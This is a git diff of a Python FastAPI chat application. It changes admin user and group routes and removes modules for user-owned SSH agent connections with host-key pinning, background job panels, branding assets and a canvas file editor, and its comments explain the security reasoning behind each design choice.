sharing.forget_principal(db, PRINCIPAL_USER, target.id)
# And the same shape a third time: the chats cascade, their attachment rows
# cascade, and every file those rows named stays on disk with nothing left
# that will ever look at it. Before the delete, while the rows still say
# which files they are.
chat_service.delete_chats(db, list(db.scalars(select(Chat).where(Chat.user_id == target.id))))
db.delete(target)
db.commit()
log.info("%s deleted account %s", user.email, email)
@@ -263,42 +182,17 @@ async def delete_user(db: Db, user: AdminUser, user_id: str) -> Response:
# --- Groups ------------------------------------------------------------------
# The same list-plus-detail shape. The old page rendered every group's full
# permission grid, every member and every model on one screen, which is fine for
# two groups and unreadable at ten.
@router.get("/groups")
async def groups_page(request: Request, db: Db, user: AdminUser, saved: str = ""):
groups = list(db.scalars(select(Group).order_by(Group.name)))
return render(
request,
"admin/groups.html",
{
"groups": groups,
"granted": {
group.id: sum(1 for on in (group.permissions_json or {}).values() if on)
for group in groups
},
"permission_groups": permissions.permission_groups(),
"baseline": permissions.baseline_permissions(db),
"saved": saved,
},
)
@router.get("/groups/{group_id}")
async def group_detail(request: Request, db: Db, user: AdminUser, group_id: str, saved: str = ""):
group = _group(db, group_id)
return render(
request,
"admin/group_detail.html",
{
"group": group,
"groups": list(db.scalars(select(Group).order_by(Group.name))),
"users": list(db.scalars(select(User).order_by(User.name))),
"models": list(db.scalars(select(Model).order_by(Model.position, Model.model_id))),
"permission_groups": permissions.permission_groups(),
"baseline": permissions.baseline_permissions(db),
"limit_defs": permissions.LIMIT_DEFS,
"limits": group.limits_json or {},
"saved": saved,
},
)
@@ -322,7 +216,6 @@ async def create_group(db: Db, user: AdminUser, name: str = Form(...)) -> Respon
@router.post("/groups/{group_id}")
async def update_group(
request: Request,
db: Db,
user: AdminUser,
group_id: str,
@@ -333,7 +226,6 @@ async def update_group(
model_ids: list[str] = Form(default=[]),
) -> Response:
group = _group(db, group_id)
form = await request.form()
group.name = name.strip()[:120] or group.name
group.description = description.strip()[:1000]
@@ -343,26 +235,9 @@ async def update_group(
group.users = list(db.scalars(select(User).where(User.id.in_(user_ids or []))))
group.models = list(db.scalars(select(Model).where(Model.id.in_(model_ids or []))))
# Quotas. Only what was submitted and could be read as a number is stored, so
# a blank box means "this group has no opinion" and contributes nothing to
# the resolution -- which is what `limits_for` needs in order to tell it
# apart from a deliberate zero, and zero here means *no limit*.
wanted: dict[str, int] = {}
for key in permissions.LIMIT_KEYS:
raw = str(form.get(f"limit_{key}") or "").strip()
if not raw:
continue
try:
wanted[key] = max(0, int(raw))
except ValueError:
continue
group.limits_json = wanted
db.commit()
log.info("%s updated group %s", user.email, group.name)
return RedirectResponse(
f"/admin/groups/{group.id}?saved=Saved+{group.name}.", status_code=303
)
return RedirectResponse(f"/admin/groups?saved=Saved+{group.name}.", status_code=303)
@router.post("/groups/{group_id}/delete")
@@ -370,16 +245,8 @@ async def delete_group(db: Db, user: AdminUser, group_id: str) -> Response:
group = _group(db, group_id)
name = group.name
# Members and model links go with it; the users themselves are untouched.
#
# Every share naming this group goes too. Nothing cascades -- see
# `sharing.forget_principal` -- so a deleted group left its grants behind,
# and a group id is a random hex string that nothing reissues today and
# nothing promises not to reissue tomorrow.
dropped = sharing.forget_principal(db, PRINCIPAL_GROUP, group.id)
db.delete(group)
db.commit()
if dropped:
log.info("dropped %d share(s) naming group %s", dropped, name)
log.info("%s deleted group %s", user.email, name)
return RedirectResponse(f"/admin/groups?saved=Deleted+{name}.", status_code=303)
-607
View File
@@ -1,607 +0,0 @@
"""SSH connections, kept by the people who own them.
Not an admin screen. These are somebody's own machines and somebody's own keys,
so the pages sit beside the library rather than under `/admin` -- an
administrator decides only whether the feature exists at all.
Trust on first use, made explicit. Adding a host does not connect to it; the
**Check** button looks at its key, shows the fingerprint, and waits. Only when
that is accepted is the key pinned, and only then will anything authenticate.
`asyncssh.get_server_host_key` completes the key exchange and stops, so a host
that has not been accepted is never offered a username, let alone a credential.
"""
from __future__ import annotations
import logging
from datetime import UTC, datetime
from fastapi import APIRouter, Depends, HTTPException, Request, Response, status
from fastapi.responses import RedirectResponse
from sqlalchemy import select
from lembas.api.deps import Db, RequiredUser, require_permission
from lembas.api.pages import sidebar_context
from lembas.db.models import AUTH_METHODS, AUTH_PASSWORD, SshProfile
from lembas.services import settings_store
from lembas.services.agent import draft as draft_service
from lembas.services.agent import hosts
from lembas.services.agent import index as index_service
from lembas.services.agent import jobs as jobs_service
from lembas.services.agent import ssh as ssh_service
from lembas.services.agent import terminal as terminal_service
from lembas.services.agent.base import ExecError
from lembas.services.crypto import UNCHANGED_SENTINEL, decrypt, keep_or_replace, mask
from lembas.web.templating import render
log = logging.getLogger(__name__)
router = APIRouter(
dependencies=[Depends(require_permission("agent.ssh"))], tags=["agents"]
)
def _profile(db: Db, user: RequiredUser, profile_id: str) -> SshProfile:
"""One profile belonging to this person.
Ownership is the whole authorisation. `sharing.py` is deliberately not
involved: it grants reading, and a host somebody else can read is a host
they can log in to.
"""
profile = db.get(SshProfile, profile_id)
if profile is None or profile.owner_id != user.id:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That connection no longer exists.")
return profile
def _owned(db: Db, user_id: str) -> list[SshProfile]:
return list(
db.scalars(
select(SshProfile).where(SshProfile.owner_id == user_id).order_by(SshProfile.name)
)
)
def _back(message: str = "") -> Response:
target = f"/agents?saved={message}" if message else "/agents"
return RedirectResponse(target, status_code=status.HTTP_303_SEE_OTHER)
def _number(raw, *, default: int, low: int, high: int) -> int:
text = str(raw or "").strip()
if not text.isdigit():
return default
return min(max(int(text), low), high)
def _apply(profile: SshProfile, form) -> None:
"""Copy a submitted form onto a profile.
Checkboxes are read by key presence: FastAPI cannot tell `x=` from an absent
`x`, and an absent one is exactly what an unticked box sends.
"""
profile.name = str(form.get("name") or "").strip()[:120]
profile.host = str(form.get("host") or "").strip()[:255]
profile.username = str(form.get("username") or "").strip()[:120]
profile.port = _number(form.get("port"), default=22, low=1, high=65535)
profile.connect_timeout = _number(form.get("connect_timeout"), default=15, low=3, high=120)
profile.default_dir = str(form.get("default_dir") or "").strip()[:500]
method = str(form.get("auth") or "").strip()
profile.auth = method if method in AUTH_METHODS else profile.auth
profile.enabled = "enabled" in form
def _detail(
request: Request,
db: Db,
user: RequiredUser,
profile: SshProfile,
*,
is_new: bool,
error: str = "",
saved: str = "",
):
# The user is passed rather than read off the profile: a draft has never
# been attached to a session, so `profile.owner` is None on the one page
# that most needs a sidebar.
return render(
request,
"agents/detail.html",
{
**sidebar_context(db, user),
"profile": profile,
"is_new": is_new,
"error": error,
"saved": saved,
"unchanged": UNCHANGED_SENTINEL,
"masked_password": mask(decrypt(profile.password_encrypted))
if profile.password_encrypted
else "",
"has_key": bool(profile.private_key_encrypted),
"problem": ssh_service.available(),
# Empty on the new-connection page, where there is no host yet to
# ask about -- the answer arrives when it is submitted.
"refused": hosts.refusal_for(db, profile) if profile.host else "",
},
)
@router.get("/agents")
async def agents_page(request: Request, db: Db, user: RequiredUser, saved: str = ""):
return render(
request,
"agents/index.html",
{
**sidebar_context(db, user),
"profiles": (owned := _owned(db, user.id)),
# Keyed by id rather than resolved in the template, because the
# template has no session and this is a question about instance
# settings, not about the row.
"refusals": {p.id: hosts.refusal_for(db, p) for p in owned},
"saved": saved,
"problem": ssh_service.available(),
"enabled": bool(settings_store.agents(db).get("enabled")),
},
)
# Registered before /{profile_id}: FastAPI matches in registration order, so
# with the parameterised route first "new" is captured as an id. This has been
# a bug once already, in /admin/models.
@router.get("/agents/new")
async def new_profile_page(request: Request, db: Db, user: RequiredUser):
draft = SshProfile(
owner_id=user.id, name="", host="", username="", port=22, connect_timeout=15, enabled=True
)
return _detail(request, db, user, draft, is_new=True)
@router.post("/api/agents")
async def create_profile(request: Request, db: Db, user: RequiredUser) -> Response:
form = await request.form()
profile = SshProfile(owner_id=user.id)
_apply(profile, form)
if problem := _problem(db, profile, user.id):
return _detail(request, db, user, profile, is_new=True, error=problem)
profile.password_encrypted = keep_or_replace(str(form.get("password") or ""), "")
profile.private_key_encrypted = keep_or_replace(str(form.get("private_key") or ""), "")
profile.key_passphrase_encrypted = keep_or_replace(str(form.get("key_passphrase") or ""), "")
db.add(profile)
db.commit()
log.info("%s added ssh profile %s", user.email, profile.name)
return RedirectResponse(
f"/agents/{profile.id}?saved=Added+{profile.name}.+Check+it+to+confirm+its+fingerprint.",
status_code=status.HTTP_303_SEE_OTHER,
)
def _problem(db: Db, profile: SshProfile, owner_id: str, *, existing_id: str = "") -> str:
if not profile.name:
return "A connection needs a name."
if not profile.host:
return "A connection needs a host."
if not profile.username:
return "A connection needs a username to log in as."
# Saving is one of the two moments a DNS lookup is affordable, so this is
# where a *name* pointing at loopback is settled and written to the row for
# every later request to read for free. See services/agent/hosts.py.
#
# Not the last word -- `session.resolve` refuses one that was saved before an
# administrator moved the switch, and has to, because a row can predate a
# setting. This is here so the refusal arrives while somebody is looking at
# the form that caused it rather than at an agent chat with no tools.
resolved = hosts.restamp(profile)
if refused := hosts.refusal(db, profile.host, profile.port, resolved=resolved):
return refused
clash = db.scalar(
select(SshProfile).where(
SshProfile.owner_id == owner_id, SshProfile.name == profile.name
)
)
if clash is not None and clash.id != existing_id:
return f"You already have a connection called “{profile.name}”."
return ""
@router.get("/agents/{profile_id}")
async def profile_page(
request: Request, db: Db, user: RequiredUser, profile_id: str, saved: str = ""
):
profile = _profile(db, user, profile_id)
return _detail(request, db, user, profile, is_new=False, saved=saved)
@router.get("/api/agents/{profile_id}/browse")
async def browse_profile(
request: Request,
db: Db,
user: RequiredUser,
profile_id: str,
path: str = "",
pick: str = "dir",
):
"""One directory on the far side, as a fragment the picker swaps in.
Hung off the profile rather than the chat because the commonest caller is
the *new*-chat composer, where there is no chat yet -- the directory is one
of the things being chosen. Ownership of the profile is the whole
authorisation, as everywhere else in this module.
This is a person clicking, not a model calling, so it does not go through
`agent/policy.py`. That is the same argument the terminal panel rests on and
it holds for the same reason -- somebody who owns the credential could list
the directory with an ssh client -- but it does mean Manual mode's promise
that everything is shown to you first now has a second exception. Both are
written down in the working notes.
"""
profile = _profile(db, user, profile_id)
entries: list = []
error = ""
if refused := hosts.refusal_for(db, profile):
# First, because this one opens a connection and the others only explain
# why one would fail.
error = refused
elif hint := ssh_service.available():
error = hint
elif not profile.host_key:
# connect_kwargs would raise the same thing, but a picker that opens on
# a wall of prose about known_hosts is worse than one that says this.
error = "This connection's host key has not been confirmed yet. Check it first."
else:
try:
executor = ssh_service.SshExecutor(ssh_service.spec_from(profile), "")
entries = await executor.scan_dir(path or profile.default_dir or "/")
except ExecError as exc:
error = exc.message
here = path or profile.default_dir or "/"
return render(
request,
"agents/_browse.html",
{
"profile": profile,
"here": here,
"parent": _parent_of(here),
"entries": entries,
"error": error,
# Whether a file is a choice or only something to look at. The
# directory picker wants the folder you are standing in; Canvas
# wants the file you click. One listing, because a second copy is a
# second place for the path arithmetic to be got subtly differently.
"pick": "file" if pick == "file" else "dir",
},
)
# --- Background jobs -----------------------------------------------------------
# A job runs detached on the far side for as long as it takes -- a build, an
# install, a test suite -- and until now the only way to see one was to ask the
# model to call `job_list`. Something that outlives the reply that started it
# needs a surface that outlives the reply too.
#
# Read-only listing and stopping sit **outside `agent/policy.py`**, which makes
# this the fifth exception to "the modes govern the model, not the interface",
# after the terminal panel, the directory browser, the project listing and
# Canvas saving a file. The argument is the one those rest on: whoever owns the
# credential could read the log with `cat` and stop the job with `kill`, and a
# panel that asked permission to show what is already running would be a panel
# nobody could use. `job_stop` as a *model* tool keeps its RISK_EXECUTE and its
# approval card; nothing about what a model may do has changed.
def _job_chat(db: Db, user: RequiredUser, chat_id: str):
"""The chat, and the agent context its jobs belong to.
404 for a chat that is not this reader's, as everywhere else -- whether an
id exists is not something to hand out. The agent context is what carries
the connection, so a chat whose profile has been deleted or disabled has no
jobs to show rather than an error to render.
"""
from lembas.db.models import Chat
from lembas.services.agent import session as agent_session
chat = db.get(Chat, chat_id)
if chat is None or chat.user_id != user.id:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That chat no longer exists.")
return chat, agent_session.resolve(db, chat, user)
@router.get("/api/agents/{profile_id}/draft")
async def draft_target(db: Db, user: RequiredUser, profile_id: str, dir: str = ""):
"""The id the panels should use for a chat that does not exist yet.
Hung off the profile rather than the chat for the reason `browse` is: the
caller is the *new*-chat composer, where the connection and the directory
are the things being chosen. Ownership of the profile is the whole
authorisation, as everywhere else in this module.
Deterministic, so asking twice for the same target gives the same id and
finds the shell already running there rather than opening a second one.
"""
profile = _profile(db, user, profile_id)
# A draft is what the terminal and the canvas open against before a chat
# exists, so refusing here is refusing the whole new-chat path. `resolve`
# would refuse it anyway once a chat existed; this stops the panel opening
# on a target it will not be allowed to use.
if refused := hosts.refusal_for(db, profile):
raise HTTPException(status.HTTP_403_FORBIDDEN, refused)
draft = draft_service.remember(user.id, profile.id, dir or profile.default_dir or "")
return {"id": draft.id, "dir": draft.project_dir}
@router.get("/api/chats/{chat_id}/jobs")
async def jobs_chip(request: Request, db: Db, user: RequiredUser, chat_id: str):
"""How many jobs are running, as the chip in the composer row.
Always rendered, even at zero -- the chip is what carries `hx-trigger`, so a
fragment that collapsed to nothing would stop polling and the first job
started afterwards would never appear. The template renders an empty span in
that case, so the row does not reflow as jobs come and go.
"""
chat, agent = _job_chat(db, user, chat_id)
views = jobs_service.listing(db, chat_id) if agent is not None else []
return render(
request,
"chat/_jobs_chip.html",
{"chat": chat, "jobs": views, "running": sum(1 for view in views if view.running)},
)
@router.get("/api/chats/{chat_id}/jobs/panel")
async def jobs_panel(request: Request, db: Db, user: RequiredUser, chat_id: str, job: str = ""):
"""The list, and one job's output when a row is expanded.
The log is fetched only for the named job. Reading every job's tail on every
poll would be one SSH connection per job per five seconds, for output nobody
is looking at.
"""
chat, agent = _job_chat(db, user, chat_id)
views = jobs_service.listing(db, chat_id) if agent is not None else []
body = ""
error = ""
if job and agent is not None:
if not jobs_service.valid_id(job) or not any(view.id == job for view in views):
# Namespaced by chat on the far side, and checked here as well: the
# path is built from the chat id, but the route takes the job id
# from the URL and must not read one that belongs elsewhere.
raise HTTPException(status.HTTP_404_NOT_FOUND, "No such job.")
try:
reading = await jobs_service.read(agent, job)
body = reading.body
except ExecError as exc:
error = exc.message
return render(
request,
"chat/_jobs_panel.html",
{"chat": chat, "jobs": views, "open_job": job, "body": body, "error": error},
)
@router.post("/api/chats/{chat_id}/jobs/{job_id}/stop")
async def stop_job(request: Request, db: Db, user: RequiredUser, chat_id: str, job_id: str):
chat, agent = _job_chat(db, user, chat_id)
views = jobs_service.listing(db, chat_id) if agent is not None else []
if agent is None or not jobs_service.valid_id(job_id):
raise HTTPException(status.HTTP_404_NOT_FOUND, "No such job.")
if not any(view.id == job_id for view in views):
raise HTTPException(status.HTTP_404_NOT_FOUND, "No such job.")
error = ""
try:
await jobs_service.stop(agent, job_id)
except ExecError as exc:
error = exc.message
return render(
request,
"chat/_jobs_panel.html",
{
"chat": chat,
"jobs": jobs_service.listing(db, chat_id),
"open_job": "",
"body": "",
"error": error,
},
)
def _parent_of(path: str) -> str:
"""The directory above, or "" at the root.
Plain string work rather than pathlib: these are POSIX paths on somebody
else's machine, and running them through a local Path would apply this
host's rules to them.
"""
trimmed = (path or "/").rstrip("/")
if not trimmed or trimmed == "":
return ""
head = trimmed.rsplit("/", 1)[0]
return head or "/"
@router.post("/api/agents/{profile_id}/check")
async def check_profile(request: Request, db: Db, user: RequiredUser, profile_id: str):
"""Look at the host's key, and connect if it has already been accepted.
Two steps in one button, because they are one question: *is this the machine
I meant, and will it let me in?* An unseen key comes back as a fingerprint
to accept; an accepted one is used to log in and run something harmless.
"""
profile = _profile(db, user, profile_id)
# Before anything is sent. Check is the one button here that opens a socket,
# so a refused connection must not get one -- and the reason belongs in the
# place somebody just pressed rather than in a log.
#
# The other moment a lookup is affordable, and the one that catches a name
# whose DNS moved after it was saved: this button is how somebody finds out
# a connection has stopped working, so it is the right place to find out why.
hosts.restamp(profile)
db.commit()
if refused := hosts.refusal_for(db, profile):
return render(request, "agents/_check.html", {"profile": profile, "error": refused})
try:
line, fingerprint = await ssh_service.capture_host_key(
profile.host, profile.port, timeout=profile.connect_timeout
)
except ExecError as exc:
profile.last_error = exc.message
profile.last_checked_at = datetime.now(UTC)
db.commit()
return render(
request, "agents/_check.html", {"profile": profile, "error": exc.message}
)
if not profile.host_key:
# First sight. Nothing is pinned until a person says so.
return render(
request,
"agents/_check.html",
{"profile": profile, "offer": {"line": line, "fingerprint": fingerprint}},
)
if line.strip() != profile.host_key.strip():
message = (
"This host is presenting a different key than the one you accepted. "
"Nothing was sent to it. If you rebuilt the machine, forget the key "
"below and check again; if you did not, stop and find out why."
)
profile.last_error = message
profile.last_checked_at = datetime.now(UTC)
db.commit()
return render(
request,
"agents/_check.html",
{
"profile": profile,
"error": message,
"offer": {"line": line, "fingerprint": fingerprint, "changed": True},
},
)
try:
found = await ssh_service.check(ssh_service.spec_from(profile), profile.default_dir)
except ExecError as exc:
profile.last_error = exc.message
profile.last_checked_at = datetime.now(UTC)
db.commit()
return render(
request, "agents/_check.html", {"profile": profile, "error": exc.message}
)
profile.last_error = ""
profile.last_checked_at = datetime.now(UTC)
profile.server_info = {"system": found.get("system", ""), "cwd": found.get("cwd", "")}
db.commit()
return render(request, "agents/_check.html", {"profile": profile, "found": found})
@router.post("/api/agents/{profile_id}/accept")
async def accept_host_key(request: Request, db: Db, user: RequiredUser, profile_id: str):
"""Pin the fingerprint that was just shown.
The line is re-fetched rather than taken from the form: a value that made a
round trip through a browser is not what should end up as the thing every
future connection is checked against.
"""
profile = _profile(db, user, profile_id)
try:
line, fingerprint = await ssh_service.capture_host_key(
profile.host, profile.port, timeout=profile.connect_timeout
)
except ExecError as exc:
return render(request, "agents/_check.html", {"profile": profile, "error": exc.message})
profile.host_key = line
profile.host_fingerprint = fingerprint
profile.last_error = ""
db.commit()
log.info("%s pinned host key for %s (%s)", user.email, profile.name, fingerprint)
return render(
request,
"agents/_check.html",
{"profile": profile, "accepted": fingerprint},
)
@router.post("/api/agents/{profile_id}/forget")
async def forget_host_key(request: Request, db: Db, user: RequiredUser, profile_id: str):
profile = _profile(db, user, profile_id)
profile.host_key = ""
profile.host_fingerprint = ""
# Un-trusting a host has to reach the shell already open on it, or the one
# connection that matters is the one this does not touch.
await terminal_service.close_for_profile(profile.id)
index_service.forget(profile.id)
db.commit()
return render(request, "agents/_check.html", {"profile": profile, "forgotten": True})
@router.post("/api/agents/{profile_id}/delete")
async def delete_profile(db: Db, user: RequiredUser, profile_id: str) -> Response:
profile = _profile(db, user, profile_id)
name = profile.name
await terminal_service.close_for_profile(profile.id)
index_service.forget(profile.id)
db.delete(profile)
db.commit()
log.info("%s deleted ssh profile %s", user.email, name)
return _back(f"Deleted {name}.")
@router.post("/api/agents/{profile_id}")
async def update_profile(request: Request, db: Db, user: RequiredUser, profile_id: str):
profile = _profile(db, user, profile_id)
form = await request.form()
before = (profile.host, profile.port)
_apply(profile, form)
if problem := _problem(db, profile, user.id, existing_id=profile.id):
db.rollback()
return _detail(
request, db, user, _profile(db, user, profile_id), is_new=False, error=problem
)
profile.password_encrypted = keep_or_replace(
str(form.get("password") or ""), profile.password_encrypted
)
profile.private_key_encrypted = keep_or_replace(
str(form.get("private_key") or ""), profile.private_key_encrypted
)
profile.key_passphrase_encrypted = keep_or_replace(
str(form.get("key_passphrase") or ""), profile.key_passphrase_encrypted
)
if profile.auth == AUTH_PASSWORD:
profile.private_key_encrypted = ""
profile.key_passphrase_encrypted = ""
# A pinned key belongs to a host and a port. Moving either means this is a
# different machine until proven otherwise, and silently keeping the old
# key would be the one mistake this whole mechanism exists to prevent.
if (profile.host, profile.port) != before and profile.host_key:
profile.host_key = ""
profile.host_fingerprint = ""
log.info("%s moved ssh profile %s; its host key was forgotten", user.email, profile.name)
# A shell already open holds its own connection and would not notice any of
# this. `session.profile_for` re-checks the profile on every reply, so the
# model stops at once; without the line below, "I disabled that connection"
# would simply not be true of the terminal on screen.
if not profile.enabled or not profile.host_key or (profile.host, profile.port) != before:
await terminal_service.close_for_profile(profile.id)
index_service.forget(profile.id)
db.commit()
return RedirectResponse(
f"/agents/{profile.id}?saved=Saved.", status_code=status.HTTP_303_SEE_OTHER
)
-10
View File
@@ -34,19 +34,9 @@ def _set_session_cookie(response: Response, token: str) -> None:
# Lax is what makes this application CSRF-safe without tokens: the
# cookie is not sent on cross-site POSTs, and every mutating route here
# is a POST. Do not relax to "none".
#
# One route is no longer a POST: the terminal WebSocket is a GET, and
# what it opens is a shell. Lax still withholds the cookie from a
# handshake a foreign page starts, so the attack is blocked -- but the
# sentence above is no longer the whole story, which is why
# `api/terminal.py` also *requires* a same-origin Origin header rather
# than merely checking one when it happens to be there.
samesite="lax",
# Only over HTTPS when the deployment is not plain local http. Marking
# it secure on http would silently break sign-in for a LAN install.
# It has always meant "a network attacker on plain http can steal a
# session"; with the terminal it also means they get a shell on the
# machine behind that chat. See deploy/README.md.
secure=False,
path="/",
)
-65
View File
@@ -1,65 +0,0 @@
"""Serving what an administrator customised.
Both routes here are deliberately **unauthenticated**, and for the same reason
the manifest and the offline page are: the sign-in page needs the logo before
anybody has signed in, and a browser fetches a stylesheet and a launcher icon
outside any page's session.
What that exposes is a file an administrator uploaded on purpose to be shown to
everybody, under a random filename, in a format that cannot execute in an
`<img>` — `services/uploads.py:ALLOWED_TYPES` is what makes the last part true,
and it is why SVG is not in it.
"""
from __future__ import annotations
from fastapi import APIRouter, HTTPException, Response, status
from fastapi.responses import FileResponse
from lembas.services import branding as branding_service
from lembas.services import uploads
router = APIRouter(tags=["branding"])
@router.get("/branding.css", include_in_schema=False)
async def branding_css() -> Response:
"""The custom themes and the custom CSS.
A route rather than an inline `<style>` in `base.html`, which is a security
property before it is a caching one: an external stylesheet has no HTML
context to escape from, so an administrator's CSS cannot become markup
however it is written. Inline, the same text would be one `</style>` away
from being a script on every page.
Cached hard and busted by a query string. `base.html` links this with
`?v={{ brand.revision }}`, a hash of everything below, so the URL changes
exactly when the stylesheet does. Without that the browser's cache is what
decides when a rebrand takes effect, which is a save that looks like it
worked and did nothing.
"""
brand = branding_service.snapshot()
return Response(
branding_service.stylesheet(brand),
media_type="text/css",
headers={"Cache-Control": "public, max-age=604800"},
)
@router.get("/branding/{filename}", include_in_schema=False)
async def branding_asset(filename: str) -> Response:
"""A logo, a favicon, or a launcher icon derived from one."""
path = uploads.branding_image_path(filename)
if path is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "No such file.")
return FileResponse(
path,
media_type=uploads.media_type_for(filename),
# Public, unlike a model avatar: this is served to somebody who is not
# signed in, so there is nothing private to keep out of a shared cache.
# Names are random, so a replacement is a new URL.
headers={
"Cache-Control": "public, max-age=604800",
"X-Content-Type-Options": "nosniff",
},
)
-242
View File
@@ -1,242 +0,0 @@
"""The canvas panel: open a file, read it, change it, save it.
Every route answers with an HTML fragment, errors included. An exception page
swapped into a side panel is a blank side panel, and a panel that goes blank
tells somebody nothing about why.
`GET` never moves the active tab. There is no CSRF token in this application and
the session cookie is SameSite Lax, so a state-changing GET is a link somebody
can be made to follow -- and one of the things a tab can be is a file on
somebody's server.
"""
from __future__ import annotations
import logging
from fastapi import APIRouter, Form, HTTPException, Request, Response, status
from sqlalchemy.orm import Session as DBSession
from lembas.api.deps import Db, RequiredUser
from lembas.db.models import Chat, User
from lembas.services import canvas as canvas_service
from lembas.services import generation as generation_service
from lembas.services.agent import draft as draft_service
from lembas.services.agent.base import Conflict
from lembas.services.markdown import highlight_code, render_markdown
from lembas.web.templating import templates
log = logging.getLogger(__name__)
router = APIRouter(prefix="/api/chats", tags=["canvas"])
def _owned_chat(db: DBSession, chat_id: str, user_id: str) -> Chat:
"""404 rather than 403 for somebody else's chat: whether it exists at all is
not this account's business.
A draft id resolves to a transient `Chat` -- constructed, never saved --
which is what lets the canvas work on the new-chat screen without any of the
six sources learning that drafts exist. See services/agent/draft.py.
"""
if draft_service.is_draft(chat_id):
draft = draft_service.get(chat_id, user_id)
if draft is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That chat no longer exists.")
return draft_service.as_chat(draft)
chat = db.get(Chat, chat_id)
if chat is None or chat.user_id != user_id:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That chat no longer exists.")
return chat
def _remember_tabs(chat: Chat, state: dict) -> bool:
"""Put the tab strip back where it came from. True when it was a draft.
A draft's tabs live in the registry rather than on a row, so the two write
paths below fork here rather than each remembering to check.
"""
if not draft_service.is_draft(chat.id):
return False
draft = draft_service.get(chat.id, chat.user_id)
if draft is not None:
draft.canvas_json = dict(state or {})
return True
async def _panel(
request: Request,
db: DBSession,
user: User,
chat: Chat,
*,
key: str = "",
message: str = "",
conflict: canvas_service.Doc | None = None,
mine: str = "",
) -> Response:
"""The strip and whichever tab is in front, as one fragment.
Both together, always. Rendering only the body would leave the strip showing
a tab that is no longer there after a close, and rendering only the strip
would leave the previous file on screen after a switch.
"""
wanted = key or canvas_service.active_of(chat)
doc: canvas_service.Doc | None = None
error = message
if wanted and not error:
try:
doc = await canvas_service.load(db, user, chat, wanted)
except canvas_service.Refused as exc:
error = str(exc)
except Exception: # pragma: no cover - a machine going away mid-request
log.exception("canvas could not open %s", wanted)
error = "That could not be opened."
body = ""
if doc is not None and doc.text:
# The one `|safe` in this panel, and it is safe because pygments escapes
# what it is given. Markdown goes through render_markdown, the single
# path in this application allowed to emit HTML. Everything else -- the
# editor's contents, the titles, the paths -- is escaped by Jinja.
body = render_markdown(doc.text) if doc.markdown else highlight_code(doc.text, doc.language)
return templates.TemplateResponse(
request,
"chat/_canvas_inner.html",
{
"user": user,
"chat": chat,
"tabs": canvas_service.tabs_of(chat),
"active": wanted,
"doc": doc,
"rendered": body,
"error": error,
"conflict": conflict,
"mine": mine,
"canvas_agent": canvas_service.agent_ready(db, user, chat) is not None,
# What the "Open a file" dialog browses. The endpoint it calls is
# hung off the profile rather than the chat, so the button has to
# carry the profile -- and the directory it should start in, or it
# opens at the account's home and every path is a walk from there.
"agent_profile_id": chat.ssh_profile_id or "",
"agent_dir": chat.project_dir or "",
},
)
@router.get("/{chat_id}/canvas")
async def show(request: Request, db: Db, user: RequiredUser, chat_id: str, key: str = ""):
"""Whatever is in front, or the tab named by `?key=`.
Read-only in every sense: a `?key=` that is not open does not become open,
it is simply shown. Opening is a POST.
"""
chat = _owned_chat(db, chat_id, user.id)
return await _panel(request, db, user, chat, key=key)
@router.post("/{chat_id}/canvas/tabs")
async def open_tab(
request: Request,
db: Db,
user: RequiredUser,
chat_id: str,
key: str = Form(...),
title: str = Form(""),
):
"""Open a file, or bring an already-open one to the front.
Idempotent, because opening what is already open is switching to it -- the
same reason `generation.ensure` is idempotent.
"""
chat = _owned_chat(db, chat_id, user.id)
# Two of the six sources need a real row behind them, and one of those is a
# hole rather than an inconvenience -- see draft.SOURCES_NEEDING_A_CHAT.
# Refused by source name, here, rather than left to fall out of an id
# comparison somewhere further in.
if draft_service.is_draft(chat.id) and draft_service.refuses(key.split(":", 1)[0]):
return await _panel(
request, db, user, chat,
message="That can only be opened once this chat exists. Send a message first.",
)
try:
doc = await canvas_service.load(db, user, chat, key)
except canvas_service.Refused as exc:
return await _panel(request, db, user, chat, message=str(exc))
state = canvas_service.open_tab(
dict(chat.canvas_json or {}),
{"key": doc.key, "title": title.strip() or doc.title, "source": doc.key.split(":")[0]},
)
# Reassigned rather than mutated: an in-place edit of a JSON column is not
# reliably detected as a change.
chat.canvas_json = state
if not _remember_tabs(chat, state):
db.commit()
# A reply running right now holds its own snapshot, seeded when it started.
# Without this the next frame it sends would contradict what was just
# swapped in -- the same reach into live state `request_stop` makes.
live = generation_service.running_for(chat.id)
if live is not None:
canvas_service.open_tab(live.canvas, {"key": doc.key, "title": doc.title})
return await _panel(request, db, user, chat, key=doc.key)
@router.post("/{chat_id}/canvas/tabs/close")
async def close_tab(
request: Request, db: Db, user: RequiredUser, chat_id: str, key: str = Form(...)
):
chat = _owned_chat(db, chat_id, user.id)
chat.canvas_json = canvas_service.close_tab(dict(chat.canvas_json or {}), key)
if not _remember_tabs(chat, chat.canvas_json):
db.commit()
live = generation_service.running_for(chat.id)
if live is not None:
canvas_service.close_tab(live.canvas, key)
return await _panel(request, db, user, chat)
@router.post("/{chat_id}/canvas/save")
async def save(
request: Request,
db: Db,
user: RequiredUser,
chat_id: str,
key: str = Form(...),
text: str = Form(""),
revision: str = Form(""),
):
"""Write it back.
A conflict comes back as a card, at 200, so htmx swaps it: the panel has to
be able to show Overwrite, Discard mine and Show what changed, and none of
those can be offered from an error status htmx will not render. Never save
silently over a change; never discard silently either.
"""
chat = _owned_chat(db, chat_id, user.id)
try:
await canvas_service.save(db, user, chat, key, text, revision)
except Conflict:
try:
theirs = await canvas_service.load(db, user, chat, key)
except canvas_service.Refused as exc:
return await _panel(request, db, user, chat, key=key, message=str(exc))
return await _panel(request, db, user, chat, key=key, conflict=theirs, mine=text)
except canvas_service.Refused as exc:
return await _panel(request, db, user, chat, key=key, message=str(exc))
except Exception: # pragma: no cover - the machine going away mid-write
log.exception("canvas could not save %s", key)
return await _panel(
request, db, user, chat, key=key, message="That could not be saved."
)
return await _panel(request, db, user, chat, key=key)
+37 -1376
View File
File diff suppressed because it is too large Load Diff
+6 -13
View File
@@ -8,7 +8,6 @@ from typing import Annotated
from fastapi import Depends, HTTPException, Request, status
from fastapi.responses import RedirectResponse
from sqlalchemy.orm import Session as DBSession
from starlette.requests import HTTPConnection
from lembas.db.models import User
from lembas.db.session import get_session_factory
@@ -27,23 +26,17 @@ def get_db() -> Iterator[DBSession]:
Db = Annotated[DBSession, Depends(get_db)]
